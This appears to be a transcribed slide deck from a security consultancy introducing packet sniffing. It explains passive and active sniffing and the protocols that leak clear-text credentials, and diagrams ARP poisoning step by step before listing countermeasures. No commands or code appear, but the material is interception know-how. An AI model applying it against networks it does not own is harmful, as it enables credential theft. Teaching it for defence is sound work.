packet sniffing - qsecureqsecure.com.cy/white_papers/packet_sniffing_part1.pdfpage 4 introduction...
TRANSCRIPT
PACKET SNIFFINGTHE EASY WAY INTO SYSTEMSPART 1
by Demetris Papapetrouand Michael Nicolaou
Page 2
Introduction
What is a sniffer?
• A piece of software that can look at network traffic, decode it,
and give meaningful data back
What is it used for?
• by network administrators to troubleshoot problems
• by forensic investigators to analyze malware communications
• other legitimate uses
Non-legitimate uses?
• to capture clear-text and/or hashed passwords
Page 3
Introduction
Sniffing prerequisites?
• Network Analyzer / Packet Sniffing Software
• NIC in Promiscuous Mode (to sniff 3-party traffic)
• Physical access to the network (Wired / WiFi)
Types of Sniffing
• Passive Sniffing
• Active Sniffing
Page 4
Introduction
Passive Sniffing
• Performed through a hub (broadcasts all traffic)
• Performed on wireless networks (traffic is on the air)
• No packet injection needed to redirect traffic to us
Active Sniffing
• Performed on switched networks (we mainly see our traffic)
• Need to inject packets to redirect traffic to us
Page 5
Hub Network
Page 6
Switched Network
Page 7
Active Sniffing
Active Sniffing Techniques
• SPAN Port on switch
• MAC Flooding
• Rogue DHCP Server
• ARP Poisoning
• DNS Spoofing
• DNS Cache Poisoning
• Proxy Server Poisoning
• etc
Page 8
Protocols Vulnerable to Sniffing
Clear-text Protocols
Other Protocols & Applications
• Telnet / r-services
• FTP
• HTTP
• SMTP
• POP3
• IMAP
• SNMP
• SIP
• SMB
• MSSQL
• MySQL
• Oracle
• Sybase
• VNC
• IKE
• SIP/RTP
Page 9
ARP Poisoning
Page 10
OSI 7 Layers and the ARP Protocol
Application
Data Link
Presentation
Physical
Session
Transport
Network
Ethernet
IP
TCP, UDP
RPC, NETBIOS
MIME, MPEG
HTTP, FTP, SMTP
ARP
Page 11
Address Resolution Protocol (ARP)
What is it?
• Protocol for mapping IP to MAC addresses
• Restricted to the LAN
• Uses broadcasts (Ethernet)
• Uses requests and replies
• Uses announcements (Gratuitous ARP)
• Machines cache IP to MAC mappings (ARP table)
Page 12
Normal Traffic - ARP Communication
Alice
Bob
ARPWho has Alice’s MAC? Tell Bob.
ARPAlice’s MAC is xx:xx:xx:xx
Page 13
Normal Traffic – IP Communication
Alice
Bob
IP: Alice’sMAC: Alice’s
IP: Bob’sMAC: Bob’s
Page 14
Normal Traffic – Packet Capture
Page 15
ARP Poisoning – Spoofed packets
Alice
Bob
ARPAlice’s IP is at Chuck’s MAC
Chuck
ARPBob’s IP is at Chuck’s MAC
Page 16
ARP Poisoning – Redirected Request
Alice
Bob
IP: Bob’sMAC: Bob’s
IP: Bob’sMAC: Chuck’s Chuck
Page 17
ARP Poisoning – Redirected Reply
Alice
Bob
IP: Alice’sMAC: Chuck’s
IP: Alice’sMAC: Alice’s Chuck
Page 18
Logical Network Diagram - Demo
Internet
Router10.10.10.1
Attacker10.10.10.4
Victim10.10.10.2
Page 19
DEMO
Page 20
ARP Poisoning Countermeasures
“DHCP Snooping” and "Dynamic ARP Inspection” (Cisco switches)
Static ARP entries (built-in commands, ARPFreeze)
3rd party prevention tools (AntiARP, ArpStar, ArpON)
3rd party detection tools (Arpwatch, Winarpwatch)
IDS/IPS detection rules
Page 21
In Part 2 of this series
DNS Spoofing
NBNS Spoofing
Proxy Server Poisoning
Credential Harvesting
Rogue Software Updates
Traffic Manipulation and Client-Side Attacks
Page 22
Download Presentation
Presentation slides available at
www.qsecure.com.cy/whitepapers/Packet_Sniffing_Part1.pdf
Page 23
We would be happy to help.
Do You Have Any Questions?